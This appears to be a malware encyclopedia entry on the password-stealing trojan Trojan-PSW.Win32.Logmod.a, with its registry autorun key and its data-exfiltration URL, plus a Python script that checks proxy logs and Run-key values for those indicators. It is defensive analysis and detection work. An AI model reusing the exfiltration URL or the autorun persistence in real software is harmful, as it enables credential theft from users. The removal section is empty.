Trojan-PSW.Win32.Logmod.a
| Alert Level : | Medium |
| Discovered: | Aug 16 2002 |
| Tag: | Password-stealing Trojans |
| Discoverer and Source: | http://www.kaspersky.com/ |
Malware Behavior and Technical Description
The Logmod program belongs to the family of password-stealing trojans.
Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, etc.
When run, the trojan installs itself into the system. While installing, Logmod registers itself in the system registry auto-run section:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Sysres = Sysres.exe
The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system.
To send stolen data out of infected computers, Logmod opens an Internet URL with the following request:
http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login=
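The two indicators described above (the `Sysres` Run value and the outbound request) can be checked with a short script. This is an added example, not part of the original description: the function names, the proxy log layout (`timestamp client_ip method url status`) and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the description above.
RUN_VALUE_NAME = "sysres"
RUN_VALUE_DATA = "sysres.exe"
EXFIL_HOST = "stats.internetsexprovider.com"
EXFIL_PATH = "/resident/sysweb.php3"

def match_exfil_url(url):
    """Return the query parameters if url matches the Logmod request, else None."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != EXFIL_HOST:
        return None
    if parts.path.lower() != EXFIL_PATH:
        return None
    # keep_blank_values so an empty 'Login=' is still reported
    return parse_qs(parts.query, keep_blank_values=True)

def scan_proxy_log(lines):
    """Scan proxy lines in the assumed layout 'timestamp client_ip method url status'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or truncated line
        params = match_exfil_url(fields[3])
        if params is not None:
            hits.append((fields[0], fields[1], sorted(params)))
    return hits

def match_run_entry(name, data):
    """Check one value exported from the HKLM Run key (name and data as strings)."""
    # Compare only the file name, so a fully qualified or quoted path also matches.
    exe = data.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1]
    return name.strip().lower() == RUN_VALUE_NAME and exe.lower() == RUN_VALUE_DATA

# Constructed sample data (not real telemetry).
SAMPLE_LOG = [
    "2002-08-20T10:01:02 10.0.0.5 GET http://example.com/index.html 200",
    "2002-08-20T10:01:09 10.0.0.7 GET http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login=user1 200",
    "2002-08-20T10:02:00 10.0.0.8 GET http://stats.internetsexprovider.com/other.html 200",
]
SAMPLE_RUN = {"Sysres": "Sysres.exe", "Updater": r"C:\Program Files\App\update.exe"}

if __name__ == "__main__":
    for ts, client, keys in scan_proxy_log(SAMPLE_LOG):
        print(ts, client, "Logmod request, parameters:", keys)
    for name, data in SAMPLE_RUN.items():
        if match_run_entry(name, data):
            print("Run entry matches Logmod:", name, "=", data)
```

A Run-key match on a host where `Sysres.exe` is not in the Windows or Windows system directory is still worth investigating, since the entry indicates the trojan was executed even though it would not start at boot.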
Trojan-PSW.Win32.Logmod.a removal instructions:

